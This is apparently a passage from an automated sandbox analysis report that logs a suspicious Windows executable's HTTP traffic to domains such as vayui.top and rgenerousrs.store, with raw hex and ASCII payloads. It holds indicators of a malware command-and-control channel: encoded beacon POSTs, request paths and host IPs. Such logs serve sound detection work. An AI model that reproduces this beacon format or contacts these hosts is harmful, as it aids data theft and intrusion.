                                                        Data Raw: 6c 4a 6f 4c 6c 3d 6c 43 4f 75 5a 30 70 64 4d 4e 79 74 59 32 35 61 43 76 2b 66 4b 6c 42 4d 6a 6d 64 6d 6e 57 69 71 48 54 4a 74 42 75 2f 45 58 7a 4a 63 6e 43 67 59 74 6b 4f 68 54 58 63 46 48 6d 71 56 64 6b 4a 76 74 50 2b 34 4e 47 66 73 69 50 67 67 35 65 68 34 6a 76 31 4a 65 38 6e 6e 6d 4a 71 62 42 7a 38 49 37 75 43 6b 68 6d 68 79 37 49 51 6e 64 36 6c 44 55 6c 70 7a 45 74 51 34 44 51 4e 31 6b 59 7a 6e 38 4b 62 73 6b 69 73 4f 57 47 71 41 7a 4c 71 37 6e 4f 41 47 4b 35 45 68 54 4f 57 68 2b 6d 4d 32 67 61 5a 68 59 6e 66 5a 6e 6f 4e 4d 37 2f 72 74 2b 6b 55 71 4c 55 34 36 4b 67 5a 66 41 74 4b 65 4a 68 45 32 50 59 63 64 4d 6a 49 4c 64 78 43 2f 4f 62 4f 42 50 4b 38 48 69 57 6f 46 4d 64 7a 68 2f 58 61 38 37 47 70 42 4c 2b 6a 4c 35 71 37 66 30 77 63 4f 2b 6c 75 46 77 6c 49 73 73 4f 58 64 76 56 41 71 4d 67 4e 79 2f 53 51 59 75 6e 6e 75 72 61 70 4b 52 4d 7a 74 37 6e 78 65 2b 6e 48 4a 63 47 53 6e 42 4b 61 47 4d 58 34 52 4f 47 39 48 70 4c 4e 50 75 68 72 2b 4c 76 69 52 6c 70 57 4b 53 34 49 6c 69 48 74 70 55 56 58 4e [TRUNCATED]
                                                        Data Ascii: lJoLl=lCOuZ0pdMNytY25aCv+fKlBMjmdmnWiqHTJtBu/EXzJcnCgYtkOhTXcFHmqVdkJvtP+4NGfsiPgg5eh4jv1Je8nnmJqbBz8I7uCkhmhy7IQnd6lDUlpzEtQ4DQN1kYzn8KbskisOWGqAzLq7nOAGK5EhTOWh+mM2gaZhYnfZnoNM7/rt+kUqLU46KgZfAtKeJhE2PYcdMjILdxC/ObOBPK8HiWoFMdzh/Xa87GpBL+jL5q7f0wcO+luFwlIssOXdvVAqMgNy/SQYunnurapKRMzt7nxe+nHJcGSnBKaGMX4ROG9HpLNPuhr+LviRlpWKS4IliHtpUVXNz934+9Pi/udq2eU5x5+9BRxQA6Ms9Q50JU9U4ubXoTFOwWeKWsNFlHfc2IMsH0DbT1Un5Gph91dhrxeGUGJBMzbYNGH+trYSb0TZa+jskhbrlRYH68ilK7vR9U/cXDOyGTdhBIKg+WGgN1jB1++zfO/hNQi27chWRZ6sFZGbC8+JcWDOPI5zJnAZRQqNZb7206z9/5lz7A3mcNPyZIZ/gven0QN4136Z9hlLWLqVsrtLbkheD8P/QF4u2TedLZtku2/s/hzlsVDskk547brOqkQvXk4Cf0+KKDZUDXeOBn6X11Lgiy+0hsofsFXoL3b2UrwAvKeAlnzCM4H9CcEhgUqdB2Ob5RRf+L2Zz9u98Oy/Rh6+/heslYXFA/45UH5TedJlwqMFas0DPDc0NbxzyAnTdpMaf99UTkNSAzcrBFfj1kria2bzAbVAb/ZcXegE38u8hhOBC/0XVDUQtxY8xt/mIAXjylT69trkWTnaNr/0miUXo7xxduoJoQWPftppmWodZgLEbM1SHGh406xcTrgfYqSwQ7f4H9+7puvQAVSGXITgwq1UJuPbufIDGxMlSGx+SEcx3unhAYjCN7UkDktnuDJjPW1jES8r7m0SetjJhwabZ5AoRcjuea2cudp8POfYgzFbhWygWppPudpemLkdmuffcTE320 [TRUNCATED]
                                                        Nov 28, 2024 09:29:27.125948906 CET683INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Thu, 28 Nov 2024 08:29:26 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                        Cache-Control: no-cache
                                                        Content-Encoding: br
                                                        Data Raw: 31 62 39 0d 0a a1 f0 19 00 20 d3 74 39 ad 1c b5 70 c1 12 27 79 52 f3 a9 bf 55 d1 77 ed c0 39 51 27 3a d5 c8 06 df 2c 39 71 c0 13 2e 8f ba d9 c1 0e 7a 9b 6b f6 ec 4f 90 7a 70 cc ad 11 48 97 04 a6 e9 f4 50 ab 11 c0 4f 2a da 33 4c 32 e5 16 b4 bf 80 a0 69 b1 1b 33 e5 9b b9 94 e5 04 23 67 11 58 80 53 4e 7e 7e d7 d6 0f 19 16 50 8a 58 07 1b 41 aa 8c 73 07 0e 4b da e2 28 47 e8 1f e2 be fb 9f 22 f1 e4 b6 01 3a c0 b5 62 e5 e7 37 b6 32 92 72 d7 68 5a d7 cf cf a5 50 f4 97 fe 9e fe c5 64 2e e5 f5 7c ae 76 97 3a 7c 25 98 c7 4e 42 88 bd e4 b5 6f d9 f7 6d af 7d 18 22 17 ca 20 ca 1b fb e9 bf 2f 21 87 15 84 28 bc 38 4a a0 41 10 e5 cb 2e 7b 43 42 ff eb ed 29 09 d0 7f 40 9f 67 99 56 c2 72 a1 a2 28 b6 a9 c8 4b 93 27 59 21 ac ce 04 d7 29 44 58 db bc 16 65 92 a6 26 76 ce 95 b9 49 84 48 4b c1 33 11 67 65 a6 53 e1 4b 3e 40 e6 31 cf bd 51 69 6e bd 17 85 2e ad 2e d3 58 29 6f 22 1f b9 3c 29 79 3e e2 da 4e cc b6 d1 13 c0 94 84 bf bf 4b b7 58 4a 18 22 0d 11 ec fc f5 fd 07 b5 ce cc 77 d3 65 60 70 8c 15 d6 08 85 b0 06 91 f9 a1 6c [TRUNCATED]
                                                        Data Ascii: 1b9 t9p'yRUw9Q':,9q.zkOzpHPO*3L2i3#gXSN~~PXAsK(G":b72rhZPd.|v:|%NBom}" /!(8JA.{CB)@gVr(K'Y!)DXe&vIHK3geSK>@1Qin..X)o"<)y>NKXJ"we`plwW$s$*,djvj=Y1X .p-D)<fJZJoQZdV^!rP*g0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        16192.168.2.549956185.27.134.144802788C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 28, 2024 09:29:28.586983919 CET491OUTGET /d9ku/?QjtpF=dVl4&lJoLl=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94ZsfikbXdLyEshcSDsVMvwPhhK/JQDE9yK/18FWBwj6urmQ== HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US
                                                        Host: www.amayavp.xyz
                                                        Connection: close
                                                        User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                        Nov 28, 2024 09:29:29.873720884 CET1182INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Thu, 28 Nov 2024 08:29:29 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 981
                                                        Connection: close
                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                        Cache-Control: no-cache
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 65 73 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 74 6f 4e 75 6d 62 65 72 73 28 64 29 7b 76 61 72 20 65 3d 5b 5d 3b 64 2e 72 65 70 6c 61 63 65 28 2f 28 2e 2e 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 65 2e 70 75 73 68 28 70 61 72 73 65 49 6e 74 28 64 2c 31 36 29 29 7d 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 74 6f 48 65 78 28 29 7b 66 6f 72 28 76 61 72 20 64 3d 5b 5d 2c 64 3d 31 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 41 72 72 61 79 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 61 72 67 75 6d 65 6e 74 73 2c 65 3d 22 22 2c 66 3d 30 3b 66 3c 64 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 65 2b 3d 28 31 36 3e 64 5b 66 5d 3f 22 30 22 3a 22 22 29 2b 64 5b 66 5d 2e 74 6f 53 74 72 69 6e 67 28 31 36 [TRUNCATED]
                                                        Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("06fca46dff97b8db842aafc1f1e63806");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.amayavp.xyz/d9ku/?QjtpF=dVl4&lJoLl=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94ZsfikbXdLyEshcSDsVMvwPhhK/JQDE9yK/18FWBwj6urmQ==&i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        17192.168.2.549972104.21.95.160802788C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 28, 2024 09:29:35.576153040 CET744OUTPOST /vg0z/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US
                                                        Host: www.vayui.top
                                                        Origin: http://www.vayui.top
                                                        Referer: http://www.vayui.top/vg0z/
                                                        Cache-Control: no-cache
                                                        Content-Length: 206
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                        Data Raw: 6c 4a 6f 4c 6c 3d 32 37 47 45 30 57 34 36 48 49 4c 61 57 71 56 57 64 4e 35 42 6a 6a 4b 4f 39 47 43 38 73 4d 57 78 4d 39 69 44 32 34 50 5a 2f 53 43 30 51 43 58 38 57 6b 6a 58 38 43 72 30 72 4c 50 41 41 44 70 47 6e 57 6b 65 7a 56 4d 4b 39 39 64 7a 37 32 56 5a 30 32 64 6b 51 61 43 4b 33 72 34 61 56 6a 59 70 73 69 4f 37 55 67 6a 6c 56 6f 69 62 46 34 7a 55 65 2b 61 39 76 77 59 48 6a 52 4f 6c 75 35 41 67 5a 75 77 4b 66 4f 41 43 45 5a 61 76 37 65 51 51 2f 50 66 61 58 4c 4a 37 36 69 43 2b 54 33 42 44 56 48 61 2f 4e 4b 76 50 2b 44 52 5a 7a 65 37 70 30 6d 39 37 4e 35 67 65 48 67 73 42 66 6b 6a 30 30 61 68 35 4a 71 77 3d
                                                        Data Ascii: lJoLl=27GE0W46HILaWqVWdN5BjjKO9GC8sMWxM9iD24PZ/SC0QCX8WkjX8Cr0rLPAADpGnWkezVMK99dz72VZ02dkQaCK3r4aVjYpsiO7UgjlVoibF4zUe+a9vwYHjROlu5AgZuwKfOACEZav7eQQ/PfaXLJ76iC+T3BDVHa/NKvP+DRZze7p0m97N5geHgsBfkj00ah5Jqw=
                                                        Nov 28, 2024 09:29:37.115899086 CET920INHTTP/1.1 404 Not Found
                                                        Date: Thu, 28 Nov 2024 08:29:36 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EU950W7EQb8JR2Zn%2FMLc5cuT1O1VexGEd06cGKaA2XrSDOkgNUCicPAo1BiG4mI0%2BoV4MubgRvpf9p%2F0WjbG2gA%2BSnatry40atfgwoAoYwvzF%2BMqPkUYaRXEDZ5HMDUt"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8e98fdbf1c4d5e6b-EWR
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1705&min_rtt=1705&rtt_var=852&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=744&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a 36 33 0d 0a b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: f63(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        18192.168.2.549979104.21.95.160802788C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 28, 2024 09:29:38.241751909 CET764OUTPOST /vg0z/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US
                                                        Host: www.vayui.top
                                                        Origin: http://www.vayui.top
                                                        Referer: http://www.vayui.top/vg0z/
                                                        Cache-Control: no-cache
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                        Data Raw: 6c 4a 6f 4c 6c 3d 32 37 47 45 30 57 34 36 48 49 4c 61 57 4b 46 57 66 71 56 42 72 6a 4b 52 68 57 43 38 69 73 58 5a 4d 39 75 44 32 39 76 4a 2f 68 6d 30 51 6d 62 38 59 46 6a 58 31 53 72 30 6b 72 50 59 4f 6a 70 50 6e 57 59 38 7a 58 49 4b 39 35 4e 7a 37 30 4e 5a 30 6e 64 6c 53 4b 43 45 73 62 34 63 62 44 59 70 73 69 4f 37 55 6b 4b 74 56 70 4b 62 46 49 44 55 65 66 61 2b 77 41 59 47 69 52 4f 6c 2f 70 41 6b 5a 75 78 5a 66 4b 42 6e 45 62 69 76 37 61 63 51 2b 64 33 5a 65 4c 4a 35 35 53 44 39 44 55 30 6d 62 32 43 65 43 38 36 38 76 79 6c 73 37 49 4b 44 75 45 31 54 65 5a 4d 6d 58 7a 6b 32 4f 55 43 64 75 35 78 4a 58 39 6c 4f 32 75 42 58 6f 68 35 56 6f 77 46 2b 6c 64 2f 52 39 45 55 36
                                                        Data Ascii: lJoLl=27GE0W46HILaWKFWfqVBrjKRhWC8isXZM9uD29vJ/hm0Qmb8YFjX1Sr0krPYOjpPnWY8zXIK95Nz70NZ0ndlSKCEsb4cbDYpsiO7UkKtVpKbFIDUefa+wAYGiROl/pAkZuxZfKBnEbiv7acQ+d3ZeLJ55SD9DU0mb2CeC868vyls7IKDuE1TeZMmXzk2OUCdu5xJX9lO2uBXoh5VowF+ld/R9EU6
                                                        Nov 28, 2024 09:29:39.514647007 CET910INHTTP/1.1 404 Not Found
                                                        Date: Thu, 28 Nov 2024 08:29:39 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UOR1hL3EPHCEeFGzVJzHNT2zkviWju%2B6ODP%2BSbGav4RR7CTiDjgTLFBJhJ0h691rsO10yTpvkKakS1b%2FRN%2FqN1HiCSq4VcZsbox9M2lTgijwRffdEv%2Fa92P8Ofo0r16n"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8e98fdcff8984269-EWR
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1623&min_rtt=1623&rtt_var=811&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=764&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        19192.168.2.549985104.21.95.160802788C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 28, 2024 09:29:40.898607969 CET1781OUTPOST /vg0z/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US
                                                        Host: www.vayui.top
                                                        Origin: http://www.vayui.top
                                                        Referer: http://www.vayui.top/vg0z/
                                                        Cache-Control: no-cache
                                                        Content-Length: 1242
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                        Data Raw: 6c 4a 6f 4c 6c 3d 32 37 47 45 30 57 34 36 48 49 4c 61 57 4b 46 57 66 71 56 42 72 6a 4b 52 68 57 43 38 69 73 58 5a 4d 39 75 44 32 39 76 4a 2f 68 75 30 51 56 54 38 59 6e 4c 58 6e 43 72 30 74 4c 50 62 4f 6a 6f 50 6e 57 77 34 7a 58 55 38 39 37 46 7a 70 48 46 5a 6a 6b 46 6c 62 4b 43 45 6b 37 34 5a 56 6a 5a 74 73 69 65 2f 55 67 75 74 56 70 4b 62 46 4b 4c 55 4a 65 61 2b 79 41 59 48 6a 52 4f 78 75 35 41 63 5a 71 6c 4a 66 4b 55 53 59 34 71 76 36 2b 77 51 7a 4f 66 5a 43 62 4a 42 77 43 44 66 44 55 6f 31 62 32 75 73 43 38 6d 57 76 31 4a 73 74 70 6e 5a 31 6b 77 4a 41 49 55 57 64 53 59 68 52 69 71 63 6e 37 74 4a 53 65 64 44 31 39 6c 41 67 45 52 35 71 6a 4d 79 33 62 62 61 74 31 56 48 36 56 73 6c 54 79 52 2b 55 34 70 55 71 37 2b 70 47 63 79 61 46 4a 77 55 61 74 51 46 68 52 6d 36 59 64 74 66 2f 36 5a 35 2b 53 4b 71 58 4b 41 31 57 36 79 79 6d 73 30 50 70 6f 2f 71 73 52 65 59 52 6b 6b 78 66 68 46 33 78 59 45 44 6d 2b 4e 52 33 46 6a 32 45 48 4e 39 43 45 39 77 53 30 59 39 6f 39 37 71 36 69 6d 42 38 75 6c 67 75 69 39 57 [TRUNCATED]
                                                        Data Ascii: lJoLl=27GE0W46HILaWKFWfqVBrjKRhWC8isXZM9uD29vJ/hu0QVT8YnLXnCr0tLPbOjoPnWw4zXU897FzpHFZjkFlbKCEk74ZVjZtsie/UgutVpKbFKLUJea+yAYHjROxu5AcZqlJfKUSY4qv6+wQzOfZCbJBwCDfDUo1b2usC8mWv1JstpnZ1kwJAIUWdSYhRiqcn7tJSedD19lAgER5qjMy3bbat1VH6VslTyR+U4pUq7+pGcyaFJwUatQFhRm6Ydtf/6Z5+SKqXKA1W6yyms0Ppo/qsReYRkkxfhF3xYEDm+NR3Fj2EHN9CE9wS0Y9o97q6imB8ulgui9W3wa64FtfJGAy7OicV4nvgzBKEHLnYOY5ccDdfTglSey9NhlRWoTdfqCuFQ7S/i84Qc8r+coxpo6GqLl4OiDiQxHX/1oDhzc+tLTmH7reZ8fYtdAsd2sAmq/2JPp2PDuv9oJUrJtIJ9o6GxodcZ9GL+eFsHTehtNZzU21+QT3LmacSZ8YE0kMJ2rnOFqz1r/qIDw0UX8LQIarOTM09CpFfoV5HxIHvCH/SxzsyJ8/itZ1sSdYqqcOyeSw6f5ZcVy2O3VMNDqTP566IvKrOaWcRSdJo1+yUig3fGt2o+SiHV4nKzNcUOe4M/+I5EIJkpuXU0aXs1X95a9C2clU1pTKCUvEQzREJt/HPwDyU8wERBpbRNABcmcnRTZ4NVTZsgb8IJTbeIfBCr98FxFWEz0UlzAg4MN/sa/i7BxoEvlEjGb2LSkM1DbCg7iIFK4rUtolmywQApfX23qWFsFwfSX8f6Kk018RkM6CJvIRJzrHVhH8/c4Ijw7NYzHjEwvyqFjMj8In72zjgSjdyN8d17s+0HJcXV5Ax6yiH5ez3tnRYuvmC8/Y7KMytuoKb7ZZ9RGFa7S6vTCeeSrLZlTgB1QQ6284JfFEZXGSUH+v6ahLReDUtnUt8UTqfIZmvQoOb/b//F62kKzwSKXozHVScXJqNpkuTJJ9pC7aO4 [TRUNCATED]
                                                        Nov 28, 2024 09:29:42.118144035 CET905INHTTP/1.1 404 Not Found
                                                        Date: Thu, 28 Nov 2024 08:29:41 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YCNBgNMa1jlQs6JPfGOmzxrYQTfvhqW41SkOInvAuSIHPQLQPnHOc9oyd3D3Yp5A2VqlWNJAKRoUWVXc%2BWZOSWpQ2%2BrjI2qGMkelBAS70Doh7DuSdW9uiW1dlYqqUDVO"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8e98fde05ecd7ce7-EWR
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1945&min_rtt=1945&rtt_var=972&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1781&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        20192.168.2.549990104.21.95.160802788C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 28, 2024 09:29:43.597596884 CET489OUTGET /vg0z/?lJoLl=75uk3ictCfC5d95jc9ErhxuZnXjbt/7lQbKW3bXizAnaAV7ibEnK2RjZpZGGD2cxunkBvA8A/q4ys0sLjHkTV7XKjeUdTVBJpjyjUmzrS97fQKKFffie2isBox+1pqpQFw==&QjtpF=dVl4 HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US
                                                        Host: www.vayui.top
                                                        Connection: close
                                                        User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                        Nov 28, 2024 09:29:44.852965117 CET927INHTTP/1.1 404 Not Found
                                                        Date: Thu, 28 Nov 2024 08:29:44 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y6RuzF6EvmhWGjCj0Tqp2rwXGXnJRgm8i%2F19hHUK0i%2FLRQf0zl4wfy5m%2BPCbQgdGugM9z5EMIT7FsUU3b8LoRXvPOxe1qouVKlC%2Fg%2FxO%2BXIOX9A0pSxChDY%2FavBYdcjw"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8e98fdf17bbb437e-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1683&min_rtt=1683&rtt_var=841&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=489&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        21192.168.2.550000104.21.57.248802788C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 28, 2024 09:29:50.326726913 CET768OUTPOST /o362/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US
                                                        Host: www.rgenerousrs.store
                                                        Origin: http://www.rgenerousrs.store
                                                        Referer: http://www.rgenerousrs.store/o362/
                                                        Cache-Control: no-cache
                                                        Content-Length: 206
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
